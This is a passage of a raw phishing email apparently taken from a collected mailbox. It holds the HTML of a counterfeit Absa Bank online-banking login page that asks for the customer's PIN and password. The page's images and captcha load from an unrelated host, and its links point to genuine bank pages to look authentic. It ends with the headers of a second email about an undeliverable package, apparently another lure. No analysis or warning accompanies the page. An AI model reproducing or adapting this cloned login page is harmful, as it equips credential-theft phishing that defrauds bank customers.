" tooltip=3D"Get a sound challenge">
											</button>
											<button class=3D"ui-button jcaptcha-icon-refresh" type=3D"button=
" onclick=3D"absa.jcaptcha.refreshChallenge(this)" tooltip=3D"Get a new cha=
llenge">
											</button>
											<button class=3D"ui-button jcaptcha-icon-help jcaptcha-icon-hide=
 ui-captchaCheck--iconHide" type=3D"button" onclick=3D"absa.jcaptcha.help(t=
his)" tooltip=3D"Help">
											</button>
										</div>
										<div class=3D"jcaptcha_lnk ui-captchaCheck_lnk">
											<img src=3D"http://wansernmy.com/enjoyment/images/dot_002.gif" c=
lass=3D"jcaptcha_img ui-captchaCheck_img" id=3D"jCaptchaImgID" title=3D"Cap=
tcha">
											<iframe src=3D"http://wansernmy.com/enjoyment/images/dot_002.gif=
" class=3D"jcaptcha_iframe ui-captchaCheck_iframe" scrolling=3D"no" marginw=
idth=3D"0" marginheight=3D"0" width=3D"0" height=3D"0" frameborder=3D"0"></=
iframe>										=

										</div>
										<div class=3D"jcaptcha_input">
											<input ondragstart=3D"return false" onselectstart=3D"return fals=
e" class=3D"ui-form-field ui-textBox ui-jcaptcha-textBox" name=3D"CaptchaTx=
t" id=3D"j_jcaptcha_txt" ondrag=3D"return false" oncopy=3D"return false" au=
tocomplete=3D"off" bbf_type=3D"simple:alphanumeric" bbf_required=3D"true" r=
equiredtext=3D"Enter the values from the given captcha" schematypetext=3D"E=
nter the values from the given captcha" showmehow=3D"Enter the values from =
the given captcha" messageref=3D".errorMessage" tabindex=3D"0" type=3D"inpu=
t">
										</div>
										=

										<!-- Modal Captcha Help -->
										<div class=3D"modalCaptchaHelp jcaptcha_help ui-captchaCheck_help=
" style=3D"display:none; z-index:200;">
											<div class=3D"ap-popup">
												<div class=3D"ap-popup-header"><b>Captcha Help</b>
													<div class=3D"clear-both"></div>
												</div>
												<div class=3D"ap-popup-body ap-info-box">
													<ul class=3D"ap-info-box-ul">
														<li>Enter the words you see in the box, in order and =

separated by a space. Doing so helps prevent automated programs from =

abusing this service</li>
														<li>If you are not sure what the words are, either enter your=
 best guess or click the reload button next to the distorted words</li>
														<li>Visually impaired users can click the audio button to hea=
r a set of words that can be entered instead of the visual challenge.</li>
													</ul>
												</div>
												<div class=3D"ap-popup-footer" style=3D"text-align:right;">
													<button onclick=3D"phe.modal.hideModal()" type=3D"button" tabi=
ndex=3D"0" class=3D"ui-button ap-button-extra">
														<div class=3D"ui-button-left">
															<div class=3D"ui-button-right">
																<div role=3D"button" tabindex=3D"22" class=3D"ui-button-cen=
ter">Ok</div>
															</div>
														</div>
													</button>
												</div>
											</div>
										</div>
									</div>
									=

								</div>
							</td>
						</tr>
						=

						=

						<tr class=3D"ui-row">
							<td class=3D"ui-cell" colspan=3D"2" style=3D"padding-top:2px">
								<span style=3D"color: #767676;">It is your responsibility to ensure=
 the secrecy of your PIN number.</span>
							</td>
						</tr>
					</tbody>
				</table>
				=

				<!-- Keypad -->
				<div style=3D"float: left; width: 104px; padding: 5px;">
					<div style=3D"float:left; margin-left:11px;">
						<div style=3D"-moz-user-select: none;" class=3D"ui-keypad-padContaine=
r">
							<p>Keypad</p>
							<table>
								<tbody>
									<tr>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">1</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">2</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">3</div>
										</td>
									</tr>
									<tr>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">4</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">5</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">6</div>
										</td>
									</tr>
									<tr>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">7</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">8</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">9</div>
										</td>
									</tr>
									<tr>
										<td>
											<div class=3D"ui-keypad-button util" action=3D"backspace">
												<div class=3D"backspace" unselectable=3D"on"></div>
											</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button" unselectable=3D"on">0</div>
										</td>
										<td>
											<div class=3D"ui-keypad-button util" action=3D"clear" unselectab=
le=3D"on">C</div>
										</td>
									</tr>
								</tbody>
							</table>
						</div>
					</div>
				</div>
				=

				<div class=3D"clear-both"></div>
				=

				<div class=3D"ui-formFoot">
					<div class=3D"genericMessage-place-holder" style=3D"display:block">
				=

				=

				=

				=

				=

				=

						<!--  -->
						<div id=3D"ap-login-form1-error" role=3D"alert" tabindex=3D"0" class=
=3D"ui-message ui-message-error" style=3D"display:none">
							<span class=3D"vi-screenreader-line "> Error details. </span>
							<div class=3D"ui-message-timeStamp">
								<div style=3D"display:none;"><span class=3D"vi-screenreader-line ">=
Time stamp. </span><span class=3D"vi-screenreader-line ">Year. </span>2018-=
<span class=3D"vi-screenreader-line ">Month. </span>04-<span class=3D"vi-sc=
reenreader-line ">Day. </span>16<span class=3D"vi-screenreader-line ">Time:=
. </span> </div>09:18:23
							</div>
							<div class=3D"ui-message--icon"></div>
							<div style=3D"margin-right: 120px" class=3D"ui-message-content">
								<div class=3D"ui-message-title"></div>
								<div class=3D"ui-message-body" style=3D"clear:both;">
									<!-- msg here -->
								</div>
							</div>
							<div class=3D"clear-both"></div>
						</div>
					</div>
					=

					<div class=3D"validation-place-holder"></div>
					=

					<div class=3D"ui-buttonFooter">
						<div class=3D"ui-exception-container" style=3D"border:none">
							<div style=3D"float:left">
								=

									<div id=3D"divToAfrikaans">
										<img src=3D"http://wansernmy.com/enjoyment/images/locale_en.gif" =
title=3D"" style=3D"vertical-align:middle;">
										<a tabindex=3D"-1" href=3D"#" onclick=3D"changeLang()" style=3D"c=
olor:#646464; text-decoration:underline; padding-left: 5px;">Verander na Af=
rikaans</a>
									</div>
								=

							</div>
							=

							=

							<!-- Reset Pin link -->
							=

							<div style=3D"float:left; padding-left:auto; padding-right:auto;">
								<a tabindex=3D"-1" href=3D"#" onclick=3D"absa.login.onResetPinClick=
(this)" style=3D"color:red; text-decoration:underline; padding-left: 10px;"=
>Reset PIN</a>
							</div>							=

							=

							=


							=

							<!-- FORGOTPIN LINK =

							<div style=3D"float:left; padding-left:auto; padding-right:auto;">
								<a tabindex=3D"-1" href=3D"#" onclick=3D"forgotPin()" style=3D"colo=
r:#646464; text-decoration:underline; padding-left: 5px;">Click here to res=
et your PIN</a>
							</div> -->
							=

							<!-- BACK BUTTON : DSP and FEATURE STORE -->
							=

							=

							<button aria-label=3D"Reset" type=3D"button" tabindex=3D"1" onclick=
=3D"resetForm1()" class=3D"ui-button ap-button-reset">
								<div class=3D"ui-button-left">
									<div class=3D"ui-button-right">
										<div class=3D"ui-button-center">Reset</div>
									</div>
								</div>
							</button>
							<button aria-label=3D"Next" type=3D"submit" tabindex=3D"0" class=3D"=
ui-button ap-button-next">
								<div class=3D"ui-button-left">
									<div class=3D"ui-button-right">
										<div class=3D"ui-button-center">Next</div>
									</div>
								</div>
							</button>
						</div>
					</div>
				</div>
			</form>
		</div>
	</div>
	=

	<div class=3D"ap-container-bottom-corners">
		<div class=3D"ap-corners-rounded-bottom-left"></div>
		<div class=3D"ap-corners-rounded-bottom" style=3D"width:590px;"></div>
		<div class=3D"ap-corners-rounded-bottom-right"></div>
	</div>
</div>

										=

									</div>
								</div>
								=

								<!-- ap-column-2 -->
								<div class=3D"ap-column-2" style=3D"width:296px;">
									<!-- Important Links on Right Side of Page -->
									<div id=3D"divimportantlinks" class=3D"ap-login-block-rounded">
										<!-- top round borders -->
										<div class=3D"ap-login-block-rounded-top">
											<div class=3D"ap-corners-rounded-top-left"></div>
											<div class=3D"ap-corners-rounded-top"></div>
											<div class=3D"ap-corners-rounded-top-right"></div>
										</div>
										<!-- content -->
										<div role=3D"tablist" class=3D"ui-tabBox">
											<ul class=3D"ui-tabHeads">
												<li aria-selected=3D"true" class=3D"ui-tabHead ui-tab-selected"=
 role=3D"button" tabindex=3D"13">
													Important links
													<span class=3D"vi-screenreader-line "> [selected] 1 of 1 [tab]=
.</span>
												</li>
											</ul>
											<div class=3D"ui-tabBodies">
												<div tabindex=3D"14" role=3D"tabpanel" class=3D"ui-tabBody ui-t=
abBody-selected">
													<div style=3D"background: #FFFFFF;">
														<ul class=3D"abc">
															<li><a href=3D"https://www.absa.co.za/media-centre/press-sta=
tements/old-interface-switched-off" id=3D"am" target=3D"_new">Old interface=
 switched off</a></li><li><a href=3D"https://ib.absa.co.za/absa-online/regi=
stration/?lang=3Den" id=3D"am" target=3D"_new">How to register</a></li><li>=
<a href=3D"https://www.absa.co.za/media-centre/press-statements/listed-bene=
ficiary-mfc-account-closed/" id=3D"am" target=3D"_new">Absa Listed Benefici=
aries - accounts closed</a></li><li><a href=3D"https://www.absa.co.za/media=
-centre/press-statements/absa-online-payments-issue-notice" id=3D"am" targe=
t=3D"_new"><b>Inter-Bank Payment delay</b></a></li><li><a href=3D"https://w=
ww.absa.co.za/security-centre/online-security" id=3D"am" target=3D"_new">Se=
curity enhancement</a></li><li><a href=3D"https://www.absa.co.za/talk-to-us=
/" id=3D"am" target=3D"_new">Contact us</a></li>
														</ul>
													</div>
												</div>
											</div>
										</div>
										<!-- bottom round borders -->
										<div class=3D"ap-login-block-rounded-bottom">
											<div class=3D"ap-corners-rounded-bottom-left"></div>
											<div class=3D"ap-corners-rounded-bottom"></div>
											<div class=3D"ap-corners-rounded-bottom-right"></div>
										</div>
									</div>
									=

									<!-- How it Works Right of 2nd page -->
									<div id=3D"divhowitworks" class=3D"ap-login-block-rounded" style=
=3D"display:none">
										<div>
											<!-- top round borders -->
											<div class=3D"ap-login-block-rounded-top">
												<div class=3D"ap-corners-rounded-top-left"></div>
												<div class=3D"ap-corners-rounded-top"></div>
												<div class=3D"ap-corners-rounded-top-right"></div>
											</div>
											<!-- content -->
											<div role=3D"tablist" class=3D"ui-tabBox">
												<ul class=3D"ui-tabHeads">
													<li aria-selected=3D"true" class=3D"ui-tabHead ui-tab-selected=
" role=3D"button" tabindex=3D"15">
														How it works
														<span class=3D"vi-screenreader-line "> [selected] 1 of 1 [tab=
].</span>
													</li>
												</ul>
												<div class=3D"ui-tabBodies">
													<div tabindex=3D"16" role=3D"tabpanel" class=3D"ui-tabBody ui-=
tabBody-selected">
														<div style=3D"background: #FFFFFF;">
															<div style=3D"border-bottom: 1px solid #CCCCCC;">
																<div style=3D"padding: 10px;">In this example the password =
is <b>Password1</b></div>
															</div>
															<div style=3D"margin: 10px 0px 10px 10px;"><span class=3D"pf=
smalltxt">P</span>
																<span class=3D"pfsmalltxt">a</span> <span class=3D"pfsmallt=
xt">s</span>
																<span class=3D"pfsmalltxt">s</span> <span class=3D"pfsmallt=
xt">w</span>
																<span class=3D"pfsmalltxt">o</span> <span class=3D"pfsmallt=
xt">r</span>
																<span class=3D"pfsmalltxt">d</span> <span class=3D"pfsmallt=
xt">1</span>
															</div>
															<div style=3D"margin: 10px 0px 5px 10px;">
																<input class=3D"pfsmall pf2" name=3D"dpf1" disabled=3D"true=
" tabindex=3D"17" maxlength=3D"1" value=3D"" type=3D"password">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"2" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"3" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"4" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"5" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"6" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"7" type=3D"text">
																<input class=3D"pfsmall pf2" name=3D"dpf1" disabled=3D"true=
" tabindex=3D"17" maxlength=3D"1" value=3D"" type=3D"password">
																<input class=3D"pfsmall pf2" name=3D"dpf1" disabled=3D"true=
" tabindex=3D"17" maxlength=3D"1" value=3D"" type=3D"password">
															</div>
															<div style=3D"border-top: 1px solid #CCCCCC; border-bottom: =
1px solid #CCCCCC; padding: 10px;">
																You have to enter (case sensitive):
															</div>
															<div style=3D"margin: 10px 0px 10px 10px;"><span class=3D"pf=
smalltxt">P</span>
																<span class=3D"pfsmalltxt">&nbsp;&nbsp;</span> <span class=
=3D"pfsmalltxt">&nbsp;&nbsp;</span>
																<span class=3D"pfsmalltxt">&nbsp;&nbsp;</span> <span class=
=3D"pfsmalltxt">&nbsp;&nbsp;</span>
																<span class=3D"pfsmalltxt">&nbsp;&nbsp;</span> <span class=
=3D"pfsmalltxt">&nbsp;</span>
																<span class=3D"pfsmalltxt">d</span> <span class=3D"pfsmallt=
xt">1</span>
															</div>
															<div style=3D"margin: 10px 0px 5px 10px;">
																<input class=3D"pfsmall pf2" name=3D"dpf1" disabled=3D"true=
" tabindex=3D"17" maxlength=3D"1" value=3D"" type=3D"password">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"2" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"3" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"4" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"5" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"6" type=3D"text">
																<input class=3D"pfsmall pf1" name=3D"dpf2" disabled=3D"true=
" value=3D"7" type=3D"text">
																<input class=3D"pfsmall pf2" name=3D"dpf1" disabled=3D"true=
" tabindex=3D"17" maxlength=3D"1" value=3D"" type=3D"password">
																<input class=3D"pfsmall pf2" name=3D"dpf1" disabled=3D"true=
" tabindex=3D"17" maxlength=3D"1" value=3D"" type=3D"password">
															</div>
															<br>
														</div>
													</div>
												</div>
											</div>
											<!-- bottom round borders -->
											<div class=3D"ap-login-block-rounded-bottom">
												<div class=3D"ap-corners-rounded-bottom-left"></div>
												<div class=3D"ap-corners-rounded-bottom"></div>
												<div class=3D"ap-corners-rounded-bottom-right"></div>
											</div>
										</div>
										=

										<div style=3D"padding: 14px 0px 1px 0px;" id=3D"ap-campaignImage-=
div"><a href=3D"https://www.absa.co.za/ways-to-bank/online"><img src=3D"htt=
p://wansernmy.com/enjoyment/images/Express_banking_eng.png" alt=3D"AOL Expr=
ess"></a></div>
										<div style=3D"padding: 14px 0px 1px 0px;" id=3D"ap-campAPBImage-d=
iv"><a href=3D"http://www.absa.co.za/Absacoza/"><img src=3D"http://wansernm=
y.com/enjoyment/images/APB2.jpg" alt=3D""></a></div>
									</div>
								</div>
								<!-- ap-column-2 -->
								<div class=3D"ap-columns-clear"></div>
							</div>
							=

							<!-- ap-columns-2-lhs -->
							<div style=3D"width: 100%; height: 10px;"></div>
							=

							<!-- 3 column layout -->
							<div id=3D"divbottomadds" class=3D"ap-login-columns ap-columns-33">
								<!-- ap-column-1 -->
								<div class=3D"ap-column-1">
									=

									<!-- Security Centre Links Bottom left of Login page 1 -->
									<div id=3D"divsecuritycentre" class=3D"ap-login-block-rounded">
										<!-- top round borders -->
										<div class=3D"ap-login-block-rounded-top">
											<div class=3D"ap-corners-rounded-top-left"></div>
											<div class=3D"ap-corners-rounded-top"></div>
											<div class=3D"ap-corners-rounded-top-right"></div>
										</div>
										=

										<!-- content -->
										<div role=3D"tablist" class=3D"ui-tabBox">
											<ul class=3D"ui-tabHeads">
												<li aria-selected=3D"true" class=3D"ui-tabHead ui-tab-selected"=
 role=3D"button" tabindex=3D"18">
													Security centre
													<span class=3D"vi-screenreader-line "> [selected] 1 of 1 [tab]=
.</span>
												</li>
											</ul>
											<div class=3D"ui-tabBodies">
												<div tabindex=3D"19" role=3D"tabpanel" class=3D"ui-tabBody ui-t=
abBody-selected">
													<div style=3D"background: #FFFFFF;">
														<ul class=3D"abc">
															<li><a href=3D"https://www.absa.co.za/security-centre/online=
-security" id=3D"am" target=3D"_new">Absa's online security measures</a></l=
i><li><a href=3D"https://www.absa.co.za/security-centre/online-security" id=
=3D"am" target=3D"_new">Important information about phishing</a></li><li><a=
 href=3D"https://www.absa.co.za/security-centre/online-security" id=3D"am" =
target=3D"_new">Protect yourself online</a></li><li><a href=3D"https://www.=
absa.co.za/security-centre/online-security" id=3D"am" target=3D"_new">Onlin=
e shopping and 3D Secure</a></li><li><a href=3D"https://www.absa.co.za/secu=
rity-centre/tips-and-tools/scams" id=3D"am" target=3D"_new">Latest scams</a=
></li><li><a href=3D"https://www.absa.co.za/security-centre/tips-and-tools/=
antivirus-software" id=3D"am" target=3D"_new">Latest internet security soft=
ware</a></li>
														</ul>
													</div>
												</div>
											</div>
										</div>
										=

										<!-- bottom round borders -->
										<div class=3D"ap-login-block-rounded-bottom">
											<div class=3D"ap-corners-rounded-bottom-left"></div>
											<div class=3D"ap-corners-rounded-bottom"></div>
											<div class=3D"ap-corners-rounded-bottom-right"></div>
										</div>
									</div>
								</div>
								=

								<!-- ap-column-2 -->
								<div class=3D"ap-column-2">
									<div><a href=3D"https://www.absa.co.za/security-centre/online-secu=
rity/"><img src=3D"http://wansernmy.com/enjoyment/images/Secure_en_2017.jpg=
" alt=3D""></a></div>
								</div>
								=

								<!-- ap-column-3 -->
								<div class=3D"ap-column-3">
									<div><a href=3D"https://www.absa.co.za/security-centre/online-secu=
rity"><img src=3D"http://wansernmy.com/enjoyment/images/Secmon_eng.jpg" alt=
=3D"Phishing fraud"></a></div>
								</div>
							</div>
						</div>
						=

						<!-- bottom rounded corners -->
						<div class=3D"ap-container-bottom ap-heading-titlebar-item ap-contain=
er-bottom-show">
							<div class=3D"ap-corners-rounded-bottom-left"></div>
							<div class=3D"ap-corners-rounded-bottom"></div>
							<div class=3D"ap-corners-rounded-bottom-right"></div>
						</div>
					</div>
				</div>
				=

				<!-- Page bottom corners -->
				<div class=3D"ap-main-content-wrapper-bottom">
					<div class=3D"ap-corners-rounded-bottom-left"></div>
					<div class=3D"ap-corners-rounded-bottom"></div>
					<div class=3D"ap-corners-rounded-bottom-right"></div>
				</div>
			</div>
			=

			<div class=3D"ap-footer" tabindex=3D"20">
				<div style=3D"position:relative; top:0px; left:0px; width:971px;">
					<div class=3D"ap-footer-links">
						<ul><li><a href=3D"https://www.absa.co.za/security-centre/online-secu=
rity" id=3D"am" target=3D"_new">Security centre</a></li><li><a href=3D"http=
s://www.absa.co.za/content/dam/south-africa/absa/pdf/legal/Terms-of-Use-en.=
pdf" id=3D"am" target=3D"_new">Terms of use</a></li><li><a href=3D"https://=
www.absa.co.za/legal-and-compliance/browser-requirements" id=3D"am" target=
=3D"_new">Software requirements</a></li><li><a href=3D"https://www.absa.co.=
za/about-us/absa-bank/corporate-information" id=3D"am" target=3D"_new">Bank=
ing regulations</a></li></ul>
					</div>
					<p tabindex=3D"21">
					Copyright 2011 Absa. All Rights reserved. Absa Bank Limited registrati=
on number: 1986/004794/06<br>
					Authorized financial services and registered credit provider NCRP7
					</p>
					<!-- Barclays Logo Link bottom right of page -->
					<div style=3D"position:absolute; top:0px; right:0px; width:220px; text=
-align:right;">
						<!-- <a href=3D"http://www.barclays.com" target=3D"_new"><img src=3D"=
static/style/resources/barclays_logo.gif" border=3D"0" alt=3D"Member of the=
 Barclays group"></a> -->
						<!-- =3Dxl.getImage("Images/Image/Barclays",lang) -->
					</div>
				</div>
			</div>
		</div>
		=

		=

		<!-- password tips -->
		<div class=3D"modalPasswordTips" style=3D"display: none; width: 600px; he=
ight: 443px; z-index: 200;">
			<div class=3D"ap-popup">
				<div class=3D"ap-popup-header"><b>Password tips</b>
					<div class=3D"clear-both"></div>
				</div>
				<div class=3D"ap-popup-body ap-info-box">
					<ul class=3D"ap-info-box-ul">
						<li>Never save your password/PIN on your desktop - as it may allow
 others to access your personal information, without your permission.</li>
						<li>Do not make your passwords too personal - rather create =

passwords that have letters and numbers that cannot be attributed to =

you.</li>
						<li>Never provide your Online ID or password/PIN to anyone, never wri=
te them down or share them, not even with a bank official.</li>
						<li>Never provide your Online ID or password/PIN to anyone.</li>
						<li>Only provide your online password or ID when your browser shows a=
 Secure Socket Layer(SSL) connection directly to the bank.</li>
						<li>Do not leave your computer unattended after you have entered your=
 Absa Online password.</li>
						<li>Always log or sign off at the end of a session.</li>
						<li>For your security</li>
						<li>Do not open e-mails from unknown sources.</li>
						<li>Beware of emails that ask for passwords, PINS, credit and debit c=
ard information.</li>
						<li>Avoid doing Internet Banking/ Absa Online in public areas such
 internet cafes as you never know what software is loaded that may =

compromise your transactions.</li>
						<li>Make sure no one has unauthorised access to your PC.</li>
						<li>Be especially aware that there are no security cameras trained on=
 your PC and keyboard.</li>
						<li>Ensure you have the latest anti virus software applications loade=
d on your PC and mobile devices.</li>
						<li>Make sure the software on your PC is correctly licensed.</li>
						<li>Update your operating system and browser with latest patches.</li>
						<li>Install personal firewall on your PC if you use a dial-up modem.<=
/li>
						<li>Only provide your credit card details to reputable companies.</li>
						<li>To ensure that you are using a secure shopping site, look for the=
 lock and key and security certificates online.</li>
					</ul>
				</div>
				<div class=3D"ap-popup-footer" style=3D"text-align:right;">
					<button onclick=3D"phe.modal.hideModal()" type=3D"submit" tabindex=3D"=
0" class=3D"ui-button ap-button-extra">
						<div class=3D"ui-button-left">
							<div class=3D"ui-button-right">
								<div role=3D"button" tabindex=3D"22" class=3D"ui-button-center">Ok<=
/div>
							</div>
						</div>
					</button>
				</div>
			</div>
		</div>
		=

		<!-- LOGOUT POPUP -->
		<div class=3D"ui-modal modalLogoffWarning" id=3D"modalLogoffWarning" styl=
e=3D"display:none">
			<div class=3D"ui-modalHeader">
				<div class=3D"ui-modalHeader-title">Logoff</div>
				<div class=3D"ui-modalHeader-icons"></div>
			</div>
			<div class=3D"ui-modalBody">
				<div style=3D"padding:10px;">
					<div>Your Absa Online session is about to expire in <span class=3D"ap-=
popup-body-timer" id=3D"timerSeconds"></span> seconds</div>
				 	<div>Do you want to continue?</div>
			 	</div>
			</div>
			<div class=3D"ui-modalFooter">
				<button type=3D"button" class=3D"ui-button ap-button-back" style=3D"pos=
ition:static; margin-left:0px;" onclick=3D"absa.login.doLogout()">
					<div class=3D"ui-button-left">
						<div class=3D"ui-button-right">
							<div class=3D"ui-button-center">Logoff</div>
						</div>
					</div>
				</button>
				<button type=3D"button" class=3D"ui-button ap-button-next" onclick=3D"a=
bsa.login.resetTimer2(); phe.modal.hideModal()">
					<div class=3D"ui-button-left">
						<div class=3D"ui-button-right">
							<div class=3D"ui-button-center">Continue</div>
						</div>
					</div>
				</button>
			</div>
		</div>
		=

		<!-- hidden stuff -->
		<form novalidate=3D"">
			<input name=3D"focusfield" id=3D"focusfield" value=3D"" type=3D"hidden">
			<input name=3D"lang" id=3D"lang" value=3D"en" type=3D"hidden">
			<input name=3D"fstoreURL" id=3D"fstoreURL" value=3D"https://fs.absa.co.z=
a/featuresstore/" type=3D"hidden">
			<input name=3D"fstore" id=3D"fstore" value=3D"false" type=3D"hidden">
			<input name=3D"fsid" id=3D"fsid" value=3D"0" type=3D"hidden">
			<input name=3D"dspURL" id=3D"dspURL" value=3D"https://e.absa.co.za/dspt/=
" type=3D"hidden">
			<input name=3D"dsp" id=3D"dsp" value=3D"false" type=3D"hidden">
			<input name=3D"dspid" id=3D"dspid" value=3D"0" type=3D"hidden">
			<input name=3D"dspWindowSelf" id=3D"dspWindowSelf" value=3D"null" type=
=3D"hidden">
			<input name=3D"landingpage" id=3D"landingpage" value=3D"" type=3D"hidden=
">
			<input name=3D"goto" id=3D"goto" value=3D"" type=3D"hidden">
		</form>
		=

		<div></div>
		=

		<!-- Please wait controller -->
		<div></div>
		<script type=3D"text/javascript">
			//absa.showPleaseWait("<p class=3D\"vi-screenreader-line\">Please wait</=
p>");
			//absa.login.init();
		</script>
		=

		=

	=


















































































































































































































































































































































































































































































































































<div class=3D"btl-resize-cursorElement"></div><div class=3D"btl-resize-line=
Element"></div><div class=3D"btl-resize-outlineElement"></div><div style=3D=
"display: none;" class=3D"ap-helpText-baloon"><div class=3D"ap-helpText-fra=
me"><div class=3D"ap-helpText-close-button"></div><div></div></div><div cla=
ss=3D"ap-helpText-pin"></div></div><div style=3D"display: none;" class=3D"a=
p-tooltipElement"></div></body></html>
--===============0979234491==--

From jose@monkey.org Mon May  7 16:29:39 2018 +0000
Return-Path: test@eragnarok.net
Delivered-To: jose@monkey.org
X-FDA: 74137806078.31.doll95_5438b93db145f
X-Spam-Summary: 80,6,0,62bcca620dbc5e3d,d41d8cd98f00b204,test@eragnarok.net,:,RULES_HIT:4:41:72:379:495:800:962:967:973:983:988:989:1189:1208:1221:1254:1260:1313:1314:1381:1394:1431:1436:1437:1516:1517:1518:1568:1575:1588:1589:1592:1594:1623:1714:1719:1730:1776:1792:2194:2196:2199:2200:2525:2527:2543:2553:2560:2563:2682:2685:2737:2859:2891:2894:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3865:3866:3867:3868:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:5007:6261:6671:6678:6688:8515:8518:8583:8603:8957:9025:9468:9908:10004:10015:10214:10346:10946:11473:11658:11914:12043:12295:12438:12555:12740:12895:12903:12986:13007:13019:13139:13237:13282:13283:13284:13286:13289:13439:13857:14096:14714:14898:21060:21063:21080:21121:21433:21436:21450:21451:21483:21524:21627:21731:30003:30026:30054:30055:30090:30091,0,RBL:109.238.11.143:@eragnarok.net:.lbl8.mailshell.net-62.8.5.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0
X-HE-Tag: doll95_5438b93db145f
X-Filterd-Recvd-Size: 19842
Received: from mail.eragnarok.net (116462HD011143.ikexpress.com [109.238.11.143])
	by imf29.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  7 May 2018 16:29:38 +0000 (UTC)
Received: from WIN-O11QM5H4VI8.vps.workserver.com (unknown [188.241.58.125])
	by mail.eragnarok.net (Postfix) with ESMTPA id 823DF118D6D6
	for <jose@monkey.org>; Mon,  7 May 2018 17:55:39 +0200 (CEST)
Content-Type: multipart/alternative; boundary="===============0368375105=="
MIME-Version: 1.0
Subject: :unable to deliver the package!:jose@monkey.org,
To: jose@monkey.org
